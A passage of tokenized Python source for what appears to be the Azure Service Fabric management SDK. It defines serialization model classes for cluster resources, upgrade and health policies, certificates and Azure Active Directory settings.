'type':'long'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationTypeVersionsCleanupPolicy self).__init__(**kwargs)<line_sep>self.max_unused_versions_to_keep=kwargs['max_unused_versions_to_keep']<block_end><block_end><class_stmt>ApplicationUpgradePolicy(msrest.serialization.Model)<block_start>"""Describes the policy for a monitored application upgrade. :param upgrade_replica_set_check_timeout: The maximum amount of time to block processing of an upgrade domain and prevent loss of availability when there are unexpected issues. When this timeout expires, processing of the upgrade domain will proceed regardless of availability loss issues. The timeout is reset at the start of each upgrade domain. Valid values are between 0 and 42949672925 inclusive. (unsigned 32-bit integer). :type upgrade_replica_set_check_timeout: str :param force_restart: If true, then processes are forcefully restarted during upgrade even when the code version has not changed (the upgrade only changes configuration or data). :type force_restart: bool :param rolling_upgrade_monitoring_policy: The policy used for monitoring the application upgrade. :type rolling_upgrade_monitoring_policy: ~azure.mgmt.servicefabric.models.ArmRollingUpgradeMonitoringPolicy :param application_health_policy: Defines a health policy used to evaluate the health of an application or one of its children entities. :type application_health_policy: ~azure.mgmt.servicefabric.models.ArmApplicationHealthPolicy :param upgrade_mode: The mode used to monitor health during a rolling upgrade. The values are UnmonitoredAuto, UnmonitoredManual, and Monitored. Possible values include: "Invalid", "UnmonitoredAuto", "UnmonitoredManual", "Monitored". Default value: "Monitored". :type upgrade_mode: str or ~azure.mgmt.servicefabric.models.RollingUpgradeMode :param recreate_application: Determines whether the application should be recreated on update. If value=true, the rest of the upgrade policy parameters are not allowed and it will result in availability loss. :type recreate_application: bool """<line_sep>_attribute_map={'upgrade_replica_set_check_timeout':{'key':'upgradeReplicaSetCheckTimeout' 'type':'str'} 'force_restart':{'key':'forceRestart' 'type':'bool'} 'rolling_upgrade_monitoring_policy':{'key':'rollingUpgradeMonitoringPolicy' 'type':'ArmRollingUpgradeMonitoringPolicy'} 'application_health_policy':{'key':'applicationHealthPolicy' 'type':'ArmApplicationHealthPolicy'} 'upgrade_mode':{'key':'upgradeMode' 'type':'str'} 'recreate_application':{'key':'recreateApplication' 'type':'bool'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationUpgradePolicy self).__init__(**kwargs)<line_sep>self.upgrade_replica_set_check_timeout=kwargs.get('upgrade_replica_set_check_timeout' <none>)<line_sep>self.force_restart=kwargs.get('force_restart' <false>)<line_sep>self.rolling_upgrade_monitoring_policy=kwargs.get('rolling_upgrade_monitoring_policy' <none>)<line_sep>self.application_health_policy=kwargs.get('application_health_policy' <none>)<line_sep>self.upgrade_mode=kwargs.get('upgrade_mode' "Monitored")<line_sep>self.recreate_application=kwargs.get('recreate_application' <none>)<block_end><block_end><class_stmt>ApplicationUserAssignedIdentity(msrest.serialization.Model)<block_start>"""ApplicationUserAssignedIdentity. All required parameters must be populated in order to send to Azure. :param name: Required. The friendly name of user assigned identity. :type name: str :param principal_id: Required. The principal id of user assigned identity. :type principal_id: str """<line_sep>_validation={'name':{'required':<true>} 'principal_id':{'required':<true>} }<line_sep>_attribute_map={'name':{'key':'name' 'type':'str'} 'principal_id':{'key':'principalId' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ApplicationUserAssignedIdentity self).__init__(**kwargs)<line_sep>self.name=kwargs['name']<line_sep>self.principal_id=kwargs['principal_id']<block_end><block_end><class_stmt>ArmApplicationHealthPolicy(msrest.serialization.Model)<block_start>"""Defines a health policy used to evaluate the health of an application or one of its children entities. :param consider_warning_as_error: Indicates whether warnings are treated with the same severity as errors. :type consider_warning_as_error: bool :param max_percent_unhealthy_deployed_applications: The maximum allowed percentage of unhealthy deployed applications. Allowed values are Byte values from zero to 100. The percentage represents the maximum tolerated percentage of deployed applications that can be unhealthy before the application is considered in error. This is calculated by dividing the number of unhealthy deployed applications over the number of nodes where the application is currently deployed on in the cluster. The computation rounds up to tolerate one failure on small numbers of nodes. Default percentage is zero. :type max_percent_unhealthy_deployed_applications: int :param default_service_type_health_policy: The health policy used by default to evaluate the health of a service type. :type default_service_type_health_policy: ~azure.mgmt.servicefabric.models.ArmServiceTypeHealthPolicy :param service_type_health_policy_map: The map with service type health policy per service type name. The map is empty by default. :type service_type_health_policy_map: dict[str, ~azure.mgmt.servicefabric.models.ArmServiceTypeHealthPolicy] """<line_sep>_attribute_map={'consider_warning_as_error':{'key':'considerWarningAsError' 'type':'bool'} 'max_percent_unhealthy_deployed_applications':{'key':'maxPercentUnhealthyDeployedApplications' 'type':'int'} 'default_service_type_health_policy':{'key':'defaultServiceTypeHealthPolicy' 'type':'ArmServiceTypeHealthPolicy'} 'service_type_health_policy_map':{'key':'serviceTypeHealthPolicyMap' 'type':'{ArmServiceTypeHealthPolicy}'} }<def_stmt>__init__ self **kwargs<block_start>super(ArmApplicationHealthPolicy self).__init__(**kwargs)<line_sep>self.consider_warning_as_error=kwargs.get('consider_warning_as_error' <false>)<line_sep>self.max_percent_unhealthy_deployed_applications=kwargs.get('max_percent_unhealthy_deployed_applications' 0)<line_sep>self.default_service_type_health_policy=kwargs.get('default_service_type_health_policy' <none>)<line_sep>self.service_type_health_policy_map=kwargs.get('service_type_health_policy_map' <none>)<block_end><block_end><class_stmt>ArmRollingUpgradeMonitoringPolicy(msrest.serialization.Model)<block_start>"""The policy used for monitoring the application upgrade. :param failure_action: The activation Mode of the service package. Possible values include: "Rollback", "Manual". :type failure_action: str or ~azure.mgmt.servicefabric.models.ArmUpgradeFailureAction :param health_check_wait_duration: The amount of time to wait after completing an upgrade domain before applying health policies. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type health_check_wait_duration: str :param health_check_stable_duration: The amount of time that the application or cluster must remain healthy before the upgrade proceeds to the next upgrade domain. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type health_check_stable_duration: str :param health_check_retry_timeout: The amount of time to retry health evaluation when the application or cluster is unhealthy before FailureAction is executed. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type health_check_retry_timeout: str :param upgrade_timeout: The amount of time the overall upgrade has to complete before FailureAction is executed. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type upgrade_timeout: str :param upgrade_domain_timeout: The amount of time each upgrade domain has to complete before FailureAction is executed. It is first interpreted as a string representing an ISO 8601 duration. If that fails, then it is interpreted as a number representing the total number of milliseconds. :type upgrade_domain_timeout: str """<line_sep>_attribute_map={'failure_action':{'key':'failureAction' 'type':'str'} 'health_check_wait_duration':{'key':'healthCheckWaitDuration' 'type':'str'} 'health_check_stable_duration':{'key':'healthCheckStableDuration' 'type':'str'} 'health_check_retry_timeout':{'key':'healthCheckRetryTimeout' 'type':'str'} 'upgrade_timeout':{'key':'upgradeTimeout' 'type':'str'} 'upgrade_domain_timeout':{'key':'upgradeDomainTimeout' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ArmRollingUpgradeMonitoringPolicy self).__init__(**kwargs)<line_sep>self.failure_action=kwargs.get('failure_action' <none>)<line_sep>self.health_check_wait_duration=kwargs.get('health_check_wait_duration' "0")<line_sep>self.health_check_stable_duration=kwargs.get('health_check_stable_duration' "PT0H2M0S")<line_sep>self.health_check_retry_timeout=kwargs.get('health_check_retry_timeout' "PT0H10M0S")<line_sep>self.upgrade_timeout=kwargs.get('upgrade_timeout' "P10675199DT02H48M05.4775807S")<line_sep>self.upgrade_domain_timeout=kwargs.get('upgrade_domain_timeout' "P10675199DT02H48M05.4775807S")<block_end><block_end><class_stmt>ArmServiceTypeHealthPolicy(msrest.serialization.Model)<block_start>"""Represents the health policy used to evaluate the health of services belonging to a service type. :param max_percent_unhealthy_services: The maximum percentage of services allowed to be unhealthy before your application is considered in error. :type max_percent_unhealthy_services: int :param max_percent_unhealthy_partitions_per_service: The maximum percentage of partitions per service allowed to be unhealthy before your application is considered in error. :type max_percent_unhealthy_partitions_per_service: int :param max_percent_unhealthy_replicas_per_partition: The maximum percentage of replicas per partition allowed to be unhealthy before your application is considered in error. :type max_percent_unhealthy_replicas_per_partition: int """<line_sep>_validation={'max_percent_unhealthy_services':{'maximum':100 'minimum':0} 'max_percent_unhealthy_partitions_per_service':{'maximum':100 'minimum':0} 'max_percent_unhealthy_replicas_per_partition':{'maximum':100 'minimum':0} }<line_sep>_attribute_map={'max_percent_unhealthy_services':{'key':'maxPercentUnhealthyServices' 'type':'int'} 'max_percent_unhealthy_partitions_per_service':{'key':'maxPercentUnhealthyPartitionsPerService' 'type':'int'} 'max_percent_unhealthy_replicas_per_partition':{'key':'maxPercentUnhealthyReplicasPerPartition' 'type':'int'} }<def_stmt>__init__ self **kwargs<block_start>super(ArmServiceTypeHealthPolicy self).__init__(**kwargs)<line_sep>self.max_percent_unhealthy_services=kwargs.get('max_percent_unhealthy_services' 0)<line_sep>self.max_percent_unhealthy_partitions_per_service=kwargs.get('max_percent_unhealthy_partitions_per_service' 0)<line_sep>self.max_percent_unhealthy_replicas_per_partition=kwargs.get('max_percent_unhealthy_replicas_per_partition' 0)<block_end><block_end><class_stmt>AvailableOperationDisplay(msrest.serialization.Model)<block_start>"""Operation supported by the Service Fabric resource provider. :param provider: The name of the provider. :type provider: str :param resource: The resource on which the operation is performed. :type resource: str :param operation: The operation that can be performed. :type operation: str :param description: Operation description. :type description: str """<line_sep>_attribute_map={'provider':{'key':'provider' 'type':'str'} 'resource':{'key':'resource' 'type':'str'} 'operation':{'key':'operation' 'type':'str'} 'description':{'key':'description' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(AvailableOperationDisplay self).__init__(**kwargs)<line_sep>self.provider=kwargs.get('provider' <none>)<line_sep>self.resource=kwargs.get('resource' <none>)<line_sep>self.operation=kwargs.get('operation' <none>)<line_sep>self.description=kwargs.get('description' <none>)<block_end><block_end><class_stmt>AzureActiveDirectory(msrest.serialization.Model)<block_start>"""The settings to enable AAD authentication on the cluster. :param tenant_id: Azure active directory tenant id. :type tenant_id: str :param cluster_application: Azure active directory cluster application id. :type cluster_application: str :param client_application: Azure active directory client application id. :type client_application: str """<line_sep>_attribute_map={'tenant_id':{'key':'tenantId' 'type':'str'} 'cluster_application':{'key':'clusterApplication' 'type':'str'} 'client_application':{'key':'clientApplication' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(AzureActiveDirectory self).__init__(**kwargs)<line_sep>self.tenant_id=kwargs.get('tenant_id' <none>)<line_sep>self.cluster_application=kwargs.get('cluster_application' <none>)<line_sep>self.client_application=kwargs.get('client_application' <none>)<block_end><block_end><class_stmt>CertificateDescription(msrest.serialization.Model)<block_start>"""Describes the certificate details. All required parameters must be populated in order to send to Azure. :param thumbprint: Required. Thumbprint of the primary certificate. :type thumbprint: str :param thumbprint_secondary: Thumbprint of the secondary certificate. :type thumbprint_secondary: str :param x509_store_name: The local certificate store location. Possible values include: "AddressBook", "AuthRoot", "CertificateAuthority", "Disallowed", "My", "Root", "TrustedPeople", "TrustedPublisher". :type x509_store_name: str or ~azure.mgmt.servicefabric.models.StoreName """<line_sep>_validation={'thumbprint':{'required':<true>} }<line_sep>_attribute_map={'thumbprint':{'key':'thumbprint' 'type':'str'} 'thumbprint_secondary':{'key':'thumbprintSecondary' 'type':'str'} 'x509_store_name':{'key':'x509StoreName' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(CertificateDescription self).__init__(**kwargs)<line_sep>self.thumbprint=kwargs['thumbprint']<line_sep>self.thumbprint_secondary=kwargs.get('thumbprint_secondary' <none>)<line_sep>self.x509_store_name=kwargs.get('x509_store_name' <none>)<block_end><block_end><class_stmt>ClientCertificateCommonName(msrest.serialization.Model)<block_start>"""Describes the client certificate details using common name. All required parameters must be populated in order to send to Azure. :param is_admin: Required. Indicates if the client certificate has admin access to the cluster. Non admin clients can perform only read only operations on the cluster. :type is_admin: bool :param certificate_common_name: Required. The common name of the client certificate. :type certificate_common_name: str :param certificate_issuer_thumbprint: Required. The issuer thumbprint of the client certificate. :type certificate_issuer_thumbprint: str """<line_sep>_validation={'is_admin':{'required':<true>} 'certificate_common_name':{'required':<true>} 'certificate_issuer_thumbprint':{'required':<true>} }<line_sep>_attribute_map={'is_admin':{'key':'isAdmin' 'type':'bool'} 'certificate_common_name':{'key':'certificateCommonName' 'type':'str'} 'certificate_issuer_thumbprint':{'key':'certificateIssuerThumbprint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClientCertificateCommonName self).__init__(**kwargs)<line_sep>self.is_admin=kwargs['is_admin']<line_sep>self.certificate_common_name=kwargs['certificate_common_name']<line_sep>self.certificate_issuer_thumbprint=kwargs['certificate_issuer_thumbprint']<block_end><block_end><class_stmt>ClientCertificateThumbprint(msrest.serialization.Model)<block_start>"""Describes the client certificate details using thumbprint. All required parameters must be populated in order to send to Azure. :param is_admin: Required. Indicates if the client certificate has admin access to the cluster. Non admin clients can perform only read only operations on the cluster. :type is_admin: bool :param certificate_thumbprint: Required. The thumbprint of the client certificate. :type certificate_thumbprint: str """<line_sep>_validation={'is_admin':{'required':<true>} 'certificate_thumbprint':{'required':<true>} }<line_sep>_attribute_map={'is_admin':{'key':'isAdmin' 'type':'bool'} 'certificate_thumbprint':{'key':'certificateThumbprint' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClientCertificateThumbprint self).__init__(**kwargs)<line_sep>self.is_admin=kwargs['is_admin']<line_sep>self.certificate_thumbprint=kwargs['certificate_thumbprint']<block_end><block_end><class_stmt>Resource(msrest.serialization.Model)<block_start>"""The resource model definition. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: Required. Azure resource location. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'location':{'required':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} }<def_stmt>__init__ self **kwargs<block_start>super(Resource self).__init__(**kwargs)<line_sep>self.id=<none><line_sep>self.name=<none><line_sep>self.type=<none><line_sep>self.location=kwargs['location']<line_sep>self.tags=kwargs.get('tags' <none>)<line_sep>self.etag=<none><line_sep>self.system_data=<none><block_end><block_end><class_stmt>Cluster(Resource)<block_start>"""The cluster resource. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Azure resource identifier. :vartype id: str :ivar name: Azure resource name. :vartype name: str :ivar type: Azure resource type. :vartype type: str :param location: Required. Azure resource location. :type location: str :param tags: A set of tags. Azure resource tags. :type tags: dict[str, str] :ivar etag: Azure resource etag. :vartype etag: str :ivar system_data: Metadata pertaining to creation and last modification of the resource. :vartype system_data: ~azure.mgmt.servicefabric.models.SystemData :param add_on_features: The list of add-on features to enable in the cluster. :type add_on_features: list[str or ~azure.mgmt.servicefabric.models.AddOnFeatures] :ivar available_cluster_versions: The Service Fabric runtime versions available for this cluster. :vartype available_cluster_versions: list[~azure.mgmt.servicefabric.models.ClusterVersionDetails] :param azure_active_directory: The AAD authentication settings of the cluster. :type azure_active_directory: ~azure.mgmt.servicefabric.models.AzureActiveDirectory :param certificate: The certificate to use for securing the cluster. The certificate provided will be used for node to node security within the cluster, SSL certificate for cluster management endpoint and default admin client. :type certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param certificate_common_names: Describes a list of server certificates referenced by common name that are used to secure the cluster. :type certificate_common_names: ~azure.mgmt.servicefabric.models.ServerCertificateCommonNames :param client_certificate_common_names: The list of client certificates referenced by common name that are allowed to manage the cluster. :type client_certificate_common_names: list[~azure.mgmt.servicefabric.models.ClientCertificateCommonName] :param client_certificate_thumbprints: The list of client certificates referenced by thumbprint that are allowed to manage the cluster. :type client_certificate_thumbprints: list[~azure.mgmt.servicefabric.models.ClientCertificateThumbprint] :param cluster_code_version: The Service Fabric runtime version of the cluster. This property can only by set the user when **upgradeMode** is set to 'Manual'. To get list of available Service Fabric versions for new clusters use `ClusterVersion API <./ClusterVersion.md>`_. To get the list of available version for existing clusters use **availableClusterVersions**. :type cluster_code_version: str :ivar cluster_endpoint: The Azure Resource Provider endpoint. A system service in the cluster connects to this endpoint. :vartype cluster_endpoint: str :ivar cluster_id: A service generated unique identifier for the cluster resource. :vartype cluster_id: str :ivar cluster_state: The current state of the cluster. * WaitingForNodes - Indicates that the cluster resource is created and the resource provider is waiting for Service Fabric VM extension to boot up and report to it. * Deploying - Indicates that the Service Fabric runtime is being installed on the VMs. Cluster resource will be in this state until the cluster boots up and system services are up. * BaselineUpgrade - Indicates that the cluster is upgrading to establishes the cluster version. This upgrade is automatically initiated when the cluster boots up for the first time. * UpdatingUserConfiguration - Indicates that the cluster is being upgraded with the user provided configuration. * UpdatingUserCertificate - Indicates that the cluster is being upgraded with the user provided certificate. * UpdatingInfrastructure - Indicates that the cluster is being upgraded with the latest Service Fabric runtime version. This happens only when the **upgradeMode** is set to 'Automatic'. * EnforcingClusterVersion - Indicates that cluster is on a different version than expected and the cluster is being upgraded to the expected version. * UpgradeServiceUnreachable - Indicates that the system service in the cluster is no longer polling the Resource Provider. Clusters in this state cannot be managed by the Resource Provider. * AutoScale - Indicates that the ReliabilityLevel of the cluster is being adjusted. * Ready - Indicates that the cluster is in a stable state. Possible values include: "WaitingForNodes", "Deploying", "BaselineUpgrade", "UpdatingUserConfiguration", "UpdatingUserCertificate", "UpdatingInfrastructure", "EnforcingClusterVersion", "UpgradeServiceUnreachable", "AutoScale", "Ready". :vartype cluster_state: str or ~azure.mgmt.servicefabric.models.ClusterState :param diagnostics_storage_account_config: The storage account information for storing Service Fabric diagnostic logs. :type diagnostics_storage_account_config: ~azure.mgmt.servicefabric.models.DiagnosticsStorageAccountConfig :param event_store_service_enabled: Indicates if the event store service is enabled. :type event_store_service_enabled: bool :param fabric_settings: The list of custom fabric settings to configure the cluster. :type fabric_settings: list[~azure.mgmt.servicefabric.models.SettingsSectionDescription] :param management_endpoint: The http management endpoint of the cluster. :type management_endpoint: str :param node_types: The list of node types in the cluster. :type node_types: list[~azure.mgmt.servicefabric.models.NodeTypeDescription] :ivar provisioning_state: The provisioning state of the cluster resource. Possible values include: "Updating", "Succeeded", "Failed", "Canceled". :vartype provisioning_state: str or ~azure.mgmt.servicefabric.models.ProvisioningState :param reliability_level: The reliability level sets the replica set size of system services. Learn about `ReliabilityLevel <https://docs.microsoft.com/azure/service-fabric/service-fabric-cluster-capacity>`_. * None - Run the System services with a target replica set count of 1. This should only be used for test clusters. * Bronze - Run the System services with a target replica set count of 3. This should only be used for test clusters. * Silver - Run the System services with a target replica set count of 5. * Gold - Run the System services with a target replica set count of 7. * Platinum - Run the System services with a target replica set count of 9. Possible values include: "None", "Bronze", "Silver", "Gold", "Platinum". :type reliability_level: str or ~azure.mgmt.servicefabric.models.ReliabilityLevel :param reverse_proxy_certificate: The server certificate used by reverse proxy. :type reverse_proxy_certificate: ~azure.mgmt.servicefabric.models.CertificateDescription :param reverse_proxy_certificate_common_names: Describes a list of server certificates referenced by common name that are used to secure the cluster. :type reverse_proxy_certificate_common_names: ~azure.mgmt.servicefabric.models.ServerCertificateCommonNames :param upgrade_description: The policy to use when upgrading the cluster. :type upgrade_description: ~azure.mgmt.servicefabric.models.ClusterUpgradePolicy :param upgrade_mode: The upgrade mode of the cluster when new Service Fabric runtime version is available. Possible values include: "Automatic", "Manual". Default value: "Automatic". :type upgrade_mode: str or ~azure.mgmt.servicefabric.models.UpgradeMode :param application_type_versions_cleanup_policy: The policy used to clean up unused versions. :type application_type_versions_cleanup_policy: ~azure.mgmt.servicefabric.models.ApplicationTypeVersionsCleanupPolicy :param vm_image: The VM image VMSS has been configured with. Generic names such as Windows or Linux can be used. :type vm_image: str :param sf_zonal_upgrade_mode: This property controls the logical grouping of VMs in upgrade domains (UDs). This property can't be modified if a node type with multiple Availability Zones is already present in the cluster. Possible values include: "Parallel", "Hierarchical". :type sf_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.SfZonalUpgradeMode :param vmss_zonal_upgrade_mode: This property defines the upgrade mode for the virtual machine scale set, it is mandatory if a node type with multiple Availability Zones is added. Possible values include: "Parallel", "Hierarchical". :type vmss_zonal_upgrade_mode: str or ~azure.mgmt.servicefabric.models.VmssZonalUpgradeMode :param infrastructure_service_manager: Indicates if infrastructure service manager is enabled. :type infrastructure_service_manager: bool :param upgrade_wave: Indicates when new cluster runtime version upgrades will be applied after they are released. By default is Wave0. Only applies when **upgradeMode** is set to 'Automatic'. Possible values include: "Wave0", "Wave1", "Wave2". :type upgrade_wave: str or ~azure.mgmt.servicefabric.models.ClusterUpgradeCadence :param upgrade_pause_start_timestamp_utc: Indicates the start date and time to pause automatic runtime version upgrades on the cluster for an specific period of time on the cluster (UTC). :type upgrade_pause_start_timestamp_utc: ~datetime.datetime :param upgrade_pause_end_timestamp_utc: Indicates the end date and time to pause automatic runtime version upgrades on the cluster for an specific period of time on the cluster (UTC). :type upgrade_pause_end_timestamp_utc: ~datetime.datetime :param wave_upgrade_paused: Boolean to pause automatic runtime version upgrades to the cluster. :type wave_upgrade_paused: bool :param notifications: Indicates a list of notification channels for cluster events. :type notifications: list[~azure.mgmt.servicefabric.models.Notification] """<line_sep>_validation={'id':{'readonly':<true>} 'name':{'readonly':<true>} 'type':{'readonly':<true>} 'location':{'required':<true>} 'etag':{'readonly':<true>} 'system_data':{'readonly':<true>} 'available_cluster_versions':{'readonly':<true>} 'cluster_endpoint':{'readonly':<true>} 'cluster_id':{'readonly':<true>} 'cluster_state':{'readonly':<true>} 'provisioning_state':{'readonly':<true>} }<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'location':{'key':'location' 'type':'str'} 'tags':{'key':'tags' 'type':'{str}'} 'etag':{'key':'etag' 'type':'str'} 'system_data':{'key':'systemData' 'type':'SystemData'} 'add_on_features':{'key':'properties.addOnFeatures' 'type':'[str]'} 'available_cluster_versions':{'key':'properties.availableClusterVersions' 'type':'[ClusterVersionDetails]'} 'azure_active_directory':{'key':'properties.azureActiveDirectory' 'type':'AzureActiveDirectory'} 'certificate':{'key':'properties.certificate' 'type':'CertificateDescription'} 'certificate_common_names':{'key':'properties.certificateCommonNames' 'type':'ServerCertificateCommonNames'} 'client_certificate_common_names':{'key':'properties.clientCertificateCommonNames' 'type':'[ClientCertificateCommonName]'} 'client_certificate_thumbprints':{'key':'properties.clientCertificateThumbprints' 'type':'[ClientCertificateThumbprint]'} 'cluster_code_version':{'key':'properties.clusterCodeVersion' 'type':'str'} 'cluster_endpoint':{'key':'properties.clusterEndpoint' 'type':'str'} 'cluster_id':{'key':'properties.clusterId' 'type':'str'} 'cluster_state':{'key':'properties.clusterState' 'type':'str'} 'diagnostics_storage_account_config':{'key':'properties.diagnosticsStorageAccountConfig' 'type':'DiagnosticsStorageAccountConfig'} 'event_store_service_enabled':{'key':'properties.eventStoreServiceEnabled' 'type':'bool'} 'fabric_settings':{'key':'properties.fabricSettings' 'type':'[SettingsSectionDescription]'} 'management_endpoint':{'key':'properties.managementEndpoint' 'type':'str'} 'node_types':{'key':'properties.nodeTypes' 'type':'[NodeTypeDescription]'} 'provisioning_state':{'key':'properties.provisioningState' 'type':'str'} 'reliability_level':{'key':'properties.reliabilityLevel' 'type':'str'} 'reverse_proxy_certificate':{'key':'properties.reverseProxyCertificate' 'type':'CertificateDescription'} 'reverse_proxy_certificate_common_names':{'key':'properties.reverseProxyCertificateCommonNames' 'type':'ServerCertificateCommonNames'} 'upgrade_description':{'key':'properties.upgradeDescription' 'type':'ClusterUpgradePolicy'} 'upgrade_mode':{'key':'properties.upgradeMode' 'type':'str'} 'application_type_versions_cleanup_policy':{'key':'properties.applicationTypeVersionsCleanupPolicy' 'type':'ApplicationTypeVersionsCleanupPolicy'} 'vm_image':{'key':'properties.vmImage' 'type':'str'} 'sf_zonal_upgrade_mode':{'key':'properties.sfZonalUpgradeMode' 'type':'str'} 'vmss_zonal_upgrade_mode':{'key':'properties.vmssZonalUpgradeMode' 'type':'str'} 'infrastructure_service_manager':{'key':'properties.infrastructureServiceManager' 'type':'bool'} 'upgrade_wave':{'key':'properties.upgradeWave' 'type':'str'} 'upgrade_pause_start_timestamp_utc':{'key':'properties.upgradePauseStartTimestampUtc' 'type':'iso-8601'} 'upgrade_pause_end_timestamp_utc':{'key':'properties.upgradePauseEndTimestampUtc' 'type':'iso-8601'} 'wave_upgrade_paused':{'key':'properties.waveUpgradePaused' 'type':'bool'} 'notifications':{'key':'properties.notifications' 'type':'[Notification]'} }<def_stmt>__init__ self **kwargs<block_start>super(Cluster self).__init__(**kwargs)<line_sep>self.add_on_features=kwargs.get('add_on_features' <none>)<line_sep>self.available_cluster_versions=<none><line_sep>self.azure_active_directory=kwargs.get('azure_active_directory' <none>)<line_sep>self.certificate=kwargs.get('certificate' <none>)<line_sep>self.certificate_common_names=kwargs.get('certificate_common_names' <none>)<line_sep>self.client_certificate_common_names=kwargs.get('client_certificate_common_names' <none>)<line_sep>self.client_certificate_thumbprints=kwargs.get('client_certificate_thumbprints' <none>)<line_sep>self.cluster_code_version=kwargs.get('cluster_code_version' <none>)<line_sep>self.cluster_endpoint=<none><line_sep>self.cluster_id=<none><line_sep>self.cluster_state=<none><line_sep>self.diagnostics_storage_account_config=kwargs.get('diagnostics_storage_account_config' <none>)<line_sep>self.event_store_service_enabled=kwargs.get('event_store_service_enabled' <none>)<line_sep>self.fabric_settings=kwargs.get('fabric_settings' <none>)<line_sep>self.management_endpoint=kwargs.get('management_endpoint' <none>)<line_sep>self.node_types=kwargs.get('node_types' <none>)<line_sep>self.provisioning_state=<none><line_sep>self.reliability_level=kwargs.get('reliability_level' <none>)<line_sep>self.reverse_proxy_certificate=kwargs.get('reverse_proxy_certificate' <none>)<line_sep>self.reverse_proxy_certificate_common_names=kwargs.get('reverse_proxy_certificate_common_names' <none>)<line_sep>self.upgrade_description=kwargs.get('upgrade_description' <none>)<line_sep>self.upgrade_mode=kwargs.get('upgrade_mode' "Automatic")<line_sep>self.application_type_versions_cleanup_policy=kwargs.get('application_type_versions_cleanup_policy' <none>)<line_sep>self.vm_image=kwargs.get('vm_image' <none>)<line_sep>self.sf_zonal_upgrade_mode=kwargs.get('sf_zonal_upgrade_mode' <none>)<line_sep>self.vmss_zonal_upgrade_mode=kwargs.get('vmss_zonal_upgrade_mode' <none>)<line_sep>self.infrastructure_service_manager=kwargs.get('infrastructure_service_manager' <none>)<line_sep>self.upgrade_wave=kwargs.get('upgrade_wave' <none>)<line_sep>self.upgrade_pause_start_timestamp_utc=kwargs.get('upgrade_pause_start_timestamp_utc' <none>)<line_sep>self.upgrade_pause_end_timestamp_utc=kwargs.get('upgrade_pause_end_timestamp_utc' <none>)<line_sep>self.wave_upgrade_paused=kwargs.get('wave_upgrade_paused' <none>)<line_sep>self.notifications=kwargs.get('notifications' <none>)<block_end><block_end><class_stmt>ClusterCodeVersionsListResult(msrest.serialization.Model)<block_start>"""The list results of the Service Fabric runtime versions. :param value: :type value: list[~azure.mgmt.servicefabric.models.ClusterCodeVersionsResult] :param next_link: The URL to use for getting the next set of results. :type next_link: str """<line_sep>_attribute_map={'value':{'key':'value' 'type':'[ClusterCodeVersionsResult]'} 'next_link':{'key':'nextLink' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterCodeVersionsListResult self).__init__(**kwargs)<line_sep>self.value=kwargs.get('value' <none>)<line_sep>self.next_link=kwargs.get('next_link' <none>)<block_end><block_end><class_stmt>ClusterCodeVersionsResult(msrest.serialization.Model)<block_start>"""The result of the Service Fabric runtime versions. :param id: The identification of the result. :type id: str :param name: The name of the result. :type name: str :param type: The result resource type. :type type: str :param code_version: The Service Fabric runtime version of the cluster. :type code_version: str :param support_expiry_utc: The date of expiry of support of the version. :type support_expiry_utc: str :param environment: Indicates if this version is for Windows or Linux operating system. Possible values include: "Windows", "Linux". :type environment: str or ~azure.mgmt.servicefabric.models.ClusterEnvironment """<line_sep>_attribute_map={'id':{'key':'id' 'type':'str'} 'name':{'key':'name' 'type':'str'} 'type':{'key':'type' 'type':'str'} 'code_version':{'key':'properties.codeVersion' 'type':'str'} 'support_expiry_utc':{'key':'properties.supportExpiryUtc' 'type':'str'} 'environment':{'key':'properties.environment' 'type':'str'} }<def_stmt>__init__ self **kwargs<block_start>super(ClusterCodeVersionsResult self).__init__(**kwargs)<line_sep>self.id=kwargs.get('id' <none>)<line_sep>self.name=kwargs.get('name' <none>)<line_sep>self.type=kwargs.get('type' <none>)<line_sep>self.code_version=kwargs.get('code_version' <none>)<line_sep>self.support_expiry_utc=kwargs.get('support_expiry_utc' <none>)<line_sep>self.environment=kwargs.get('environment' <none>)<block_end><block_end><class_stmt>ClusterHealthPolicy(msrest.serialization.Model)<block_start>"""Defines a health policy used to evaluate the health of the cluster or of a cluster node. :param max_percent_unhealthy_nodes: The maximum allowed percentage of unhealthy nodes before reporting an error. For example, to allow 10% of nodes to be unhealthy, this value would be 10. The percentage represents the maximum tolerated percentage of nodes that can be unhealthy before the cluster is considered in error. If the percentage is respected but there is at 